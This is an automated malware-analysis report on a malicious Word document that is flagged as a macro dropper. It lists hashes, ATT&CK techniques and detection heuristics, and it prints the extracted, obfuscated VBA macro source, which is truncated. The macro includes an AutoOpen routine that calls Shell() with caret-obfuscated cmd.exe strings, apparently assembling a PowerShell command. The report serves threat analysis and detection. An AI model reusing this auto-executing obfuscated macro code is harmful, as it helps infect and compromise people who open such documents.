Office (OLE) malware analysis — malicious · 6b850c187f0a6f7a

MALICIOUS

Office (OLE)

102.8 KB Created: 2018-06-04 06:14:00 Authoring application: Microsoft Office Word First seen: 2018-11-05

MD5: 00feea0f832bac69903931874fc157f2 SHA-1: f6c40d1f7e8fb0351eaa09964d61768fd6953880 SHA-256: 6b850c187f0a6f7af0349babd767f0de4e558b8335e29b52508c22012b32b7d5

242 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1059 Command and Scripting Interpreter T1204.002 Malicious File

The sample is a malicious Office document containing VBA macros. The Autoopen macro triggers a Shell() call, which is a critical heuristic firing. This indicates the macro is designed to execute arbitrary commands, likely to download and execute a secondary payload. The ClamAV detection further confirms its malicious nature.

Heuristics 7

ClamAV: Doc.Dropper.Agent-6572067-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Dropper.Agent-6572067-0
VBA macros detected medium 3 related findings OLE_VBA_MACROS

Document contains VBA macro code
Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 19165 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	19165 bytes
SHA-256: `b209a22d1cf6318c1bf679c6600fc43397c94d823e056748ce159abb87a67999`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "YsowKMiNPtzHL" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Function uaioO() On Error Resume Next For FAmaIU = RfYdKF To 89020 iFihH = (AqPHi - ChrW(37080 * 33991) * tiQGVt * CInt(mfHaIS + Sqr(45094)) + 48797 - 47925 / 91517 - CDate(KmHfaH - 78144 + 50625 - Hex(KWTiB / 19142)) + (mtNEkA * Tan(vabGz))) Next For dRqLwJ = jNEIRv To 77745 PMdZwp = (fLrvJT - ChrW(23088 * 10360) * Apicsj * CInt(frivZ + Sqr(79956)) + 8731 - 74443 / 79496 - CDate(njNwh - 890 + 11729 - Hex(lfUCzL / 40292)) + (EIcQM * Tan(jFzhTu))) Next uaioO = JwEHDV + Shell(zzjXzlj + Chr(NtTnJ + vbKeyC + oHfGYpfCbl) + RUfWdaWXn + bzGrCqQiYvX + IdKUZ + ZwKKPHSqB + cuBcUs + FHnJOdXWaq + qOCotn, NsHcMfl + 0 + KpwBwoq) For qGEGz = frBTpY To 69160 AmdsT = (QkwKYz - ChrW(150 * 92804) * BzjLj * CInt(YQwCio + Sqr(31931)) + 7015 - 79778 / 75134 - CDate(cjiSTp - 216 + 37650 - Hex(FKthzj / 68684)) + (ATIMDL * Tan(WhpolA))) Next End Function Sub Autoopen() On Error Resume Next For GXjXTN = hJjslq To 25474 OFwFh = (VifYU - ChrW(12297 * 92643) * zLiuYE * CInt(AZMWs + Sqr(35931)) + 18502 - 53230 / 38738 - CDate(UPzSk - 81681 + 62141 - Hex(dksBw / 98035)) + (uuJVK * Tan(SIAOfl))) Next uaioO For okMDLH = rwUPU To 3256 uTdzaN = (wXzGJ - ChrW(51223 * 4729) * zEEEz * CInt(sYpprw + Sqr(30464)) + 95607 - 51010 / 89178 - CDate(IPXoW - 28051 + 9474 - Hex(TqNMw / 3132)) + (zkwQKQ * Tan(wBvoJ))) Next End Sub Attribute VB_Name = "OzAzFFBLiRdp" Function RUfWdaWXn() On Error Resume Next For PkXjRD = iZQdW To 90171 PWlJN = (FFusn - ChrW(10962 * 38774) * jQNtbp * CInt(MBTaX + Sqr(5201)) + 82056 - 48092 / 12151 - CDate(lOXlHO - 4629 + 27824 - Hex(kJpiw / 22749)) + (FzICku * Tan(LDURi))) Next jqVTjfYMc = "md wUaukPaOz" + "zEjo RVk" + "LwEfowNSjilJQ " + "fbiMkzL & " + " " + "%^c^" + "o^m^S^" + "p^E^" For FPjowC = wLZCLf To 7127 BWWXO = (zsQDJq - ChrW(16080 * 24243) * mwTYSV * CInt(BjtUmt + Sqr(47590)) + 10961 - 83719 / 9797 - CDate(BJjwuU - 4159 + 15181 - Hex(QkoLj / 68581)) + (mGrHki * Tan(VqduB))) Next FikiSlnUoO = "c^%" + " %^c^o^" + "m^S^p^E^c^% " + " /V " + " /c " + " s" + "et %ALfbNiVMXu" + "amiWp%=IYYjSjsc" For UKMEz = CBoBz To 42030 zMQrh = (DPlzAz - ChrW(11825 * 34917) * KHQaAE * CInt(FYjMc + Sqr(63033)) + 53831 - 97361 / 9953 - CDate(lajMFw - 92435 + 18047 - Hex(oiLMGt / 79054)) + (rjkYV * Tan(zGrIV))) Next JXiipEtzKf = "n&&set %" + "iBhv" + "bvN%=p&&set " + "%viCYOjhHti" + "%=o^" + "w&&set" + " %hwEMjElmA" For WnntH = jiXFJ To 39916 CPTtM = (TmOkSU - ChrW(37729 * 30961) * mGNqa * CInt(bAuRE + Sqr(88589)) + 25508 - 12422 / 89371 - CDate(XPHSqd - 25320 + 59448 - Hex(CVHCVZ / 76867)) + (MwRrTt * Tan(aPZbI))) Next aJbXp = "wtzMjX%" + "=FInLXljqOZ" + "oMQ&&set %Fp" + "EOMNJ%=!%" For FjUzuE = zcIsi To 20686 iTzZs = (zAJct - ChrW(8187 * 42390) * sbElWw * CInt(pnDaUc + Sqr(98589)) + 69821 - 76606 / 47663 - CDate(IVlGR - 98706 + 67294 - Hex(lFWrFq / 66320)) + (FBEHL * Tan(cpjuz))) Next XvmsUBvXp = "iBhvbvN%" + "!&&set %sQT" + "CnfjRAopp" + "zda%=NvoAoNaERQ" + "vOOz&&set %dw" + "HvjtWGJI" + "j%=e^r&&" + "set" For owQWD = vAGlJF To 4904 LqSwzj = (IujjRz - ChrW(88749 * 85615) * aXALDn * CInt(AnVuhN + Sqr(37799)) + 83585 - 98228 / 9291 - CDate(ClWjwP - 72026 + 61676 - Hex(jmmmB / 16157)) + (LmFrc * Tan(BSJbp))) Next hWIpdniqovw = " %JdwwfjQLaKN" + "E%=!%v" + "iCYOjhHti%!&&" + "set %tmF" + "DiIOv" + "N%=s&&set %" For uarkM = rGZqa To 70625 XjINA = (sZDIFu - ChrW(25914 * 8292) * kEaVaj * CInt(dpBaWK + Sqr(3249)) + 70687 - 39251 / 22640 - CDate(RFotE - 16462 + 86812 - Hex(fqRmqz / 24118)) + (WVQFK * Tan(lFTLaM))) Next LitQZqa = "KQYVHfZzZ" + "DraFUw" + "%=XH" + "IuAdzLcf" + "&&set %VwhcHC" + "KfE%=h" + "e&&set %IlqHW" + "FA%=ll&&!%FpEOM" For XTotZv = qqzRcd To 2048 LCLaJw = (PEGJYT ... (truncated)

SHA-256: b209a22d1cf6318c1bf679c6600fc43397c94d823e056748ce159abb87a67999

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "YsowKMiNPtzHL"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function uaioO()
On Error Resume Next
For FAmaIU = RfYdKF To 89020
         iFihH = (AqPHi - ChrW(37080 * 33991) * tiQGVt * CInt(mfHaIS + Sqr(45094)) + 48797 - 47925 / 91517 - CDate(KmHfaH - 78144 + 50625 - Hex(KWTiB / 19142)) + (mtNEkA * Tan(vabGz)))
Next
For dRqLwJ = jNEIRv To 77745
         PMdZwp = (fLrvJT - ChrW(23088 * 10360) * Apicsj * CInt(frivZ + Sqr(79956)) + 8731 - 74443 / 79496 - CDate(njNwh - 890 + 11729 - Hex(lfUCzL / 40292)) + (EIcQM * Tan(jFzhTu)))
Next
uaioO = JwEHDV + Shell(zzjXzlj + Chr(NtTnJ + vbKeyC + oHfGYpfCbl) + RUfWdaWXn + bzGrCqQiYvX + IdKUZ + ZwKKPHSqB + cuBcUs + FHnJOdXWaq + qOCotn, NsHcMfl + 0 + KpwBwoq)
For qGEGz = frBTpY To 69160
         AmdsT = (QkwKYz - ChrW(150 * 92804) * BzjLj * CInt(YQwCio + Sqr(31931)) + 7015 - 79778 / 75134 - CDate(cjiSTp - 216 + 37650 - Hex(FKthzj / 68684)) + (ATIMDL * Tan(WhpolA)))
Next
End Function
Sub Autoopen()
On Error Resume Next
For GXjXTN = hJjslq To 25474
         OFwFh = (VifYU - ChrW(12297 * 92643) * zLiuYE * CInt(AZMWs + Sqr(35931)) + 18502 - 53230 / 38738 - CDate(UPzSk - 81681 + 62141 - Hex(dksBw / 98035)) + (uuJVK * Tan(SIAOfl)))
Next
uaioO
For okMDLH = rwUPU To 3256
         uTdzaN = (wXzGJ - ChrW(51223 * 4729) * zEEEz * CInt(sYpprw + Sqr(30464)) + 95607 - 51010 / 89178 - CDate(IPXoW - 28051 + 9474 - Hex(TqNMw / 3132)) + (zkwQKQ * Tan(wBvoJ)))
Next
End Sub


Attribute VB_Name = "OzAzFFBLiRdp"
Function RUfWdaWXn()
On Error Resume Next
For PkXjRD = iZQdW To 90171
         PWlJN = (FFusn - ChrW(10962 * 38774) * jQNtbp * CInt(MBTaX + Sqr(5201)) + 82056 - 48092 / 12151 - CDate(lOXlHO - 4629 + 27824 - Hex(kJpiw / 22749)) + (FzICku * Tan(LDURi)))
Next
jqVTjfYMc = "md wUaukPaOz" + "zEjo RVk" + "LwEfowNSjilJQ " + "fbiMkzL &  " + "   " + "%^c^" + "o^m^S^" + "p^E^"
For FPjowC = wLZCLf To 7127
         BWWXO = (zsQDJq - ChrW(16080 * 24243) * mwTYSV * CInt(BjtUmt + Sqr(47590)) + 10961 - 83719 / 9797 - CDate(BJjwuU - 4159 + 15181 - Hex(QkoLj / 68581)) + (mGrHki * Tan(VqduB)))
Next
FikiSlnUoO = "c^%" + "     %^c^o^" + "m^S^p^E^c^%   " + "  /V      " + "   /c      " + "     s" + "et %ALfbNiVMXu" + "amiWp%=IYYjSjsc"
For UKMEz = CBoBz To 42030
         zMQrh = (DPlzAz - ChrW(11825 * 34917) * KHQaAE * CInt(FYjMc + Sqr(63033)) + 53831 - 97361 / 9953 - CDate(lajMFw - 92435 + 18047 - Hex(oiLMGt / 79054)) + (rjkYV * Tan(zGrIV)))
Next
JXiipEtzKf = "n&&set %" + "iBhv" + "bvN%=p&&set " + "%viCYOjhHti" + "%=o^" + "w&&set" + " %hwEMjElmA"
For WnntH = jiXFJ To 39916
         CPTtM = (TmOkSU - ChrW(37729 * 30961) * mGNqa * CInt(bAuRE + Sqr(88589)) + 25508 - 12422 / 89371 - CDate(XPHSqd - 25320 + 59448 - Hex(CVHCVZ / 76867)) + (MwRrTt * Tan(aPZbI)))
Next
aJbXp = "wtzMjX%" + "=FInLXljqOZ" + "oMQ&&set %Fp" + "EOMNJ%=!%"
For FjUzuE = zcIsi To 20686
         iTzZs = (zAJct - ChrW(8187 * 42390) * sbElWw * CInt(pnDaUc + Sqr(98589)) + 69821 - 76606 / 47663 - CDate(IVlGR - 98706 + 67294 - Hex(lFWrFq / 66320)) + (FBEHL * Tan(cpjuz)))
Next
XvmsUBvXp = "iBhvbvN%" + "!&&set %sQT" + "CnfjRAopp" + "zda%=NvoAoNaERQ" + "vOOz&&set %dw" + "HvjtWGJI" + "j%=e^r&&" + "set"
For owQWD = vAGlJF To 4904
         LqSwzj = (IujjRz - ChrW(88749 * 85615) * aXALDn * CInt(AnVuhN + Sqr(37799)) + 83585 - 98228 / 9291 - CDate(ClWjwP - 72026 + 61676 - Hex(jmmmB / 16157)) + (LmFrc * Tan(BSJbp)))
Next
hWIpdniqovw = " %JdwwfjQLaKN" + "E%=!%v" + "iCYOjhHti%!&&" + "set %tmF" + "DiIOv" + "N%=s&&set %"
For uarkM = rGZqa To 70625
         XjINA = (sZDIFu - ChrW(25914 * 8292) * kEaVaj * CInt(dpBaWK + Sqr(3249)) + 70687 - 39251 / 22640 - CDate(RFotE - 16462 + 86812 - Hex(fqRmqz / 24118)) + (WVQFK * Tan(lFTLaM)))
Next
LitQZqa = "KQYVHfZzZ" + "DraFUw" + "%=XH" + "IuAdzLcf" + "&&set %VwhcHC" + "KfE%=h" + "e&&set %IlqHW" + "FA%=ll&&!%FpEOM"
For XTotZv = qqzRcd To 2048
         LCLaJw = (PEGJYT
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.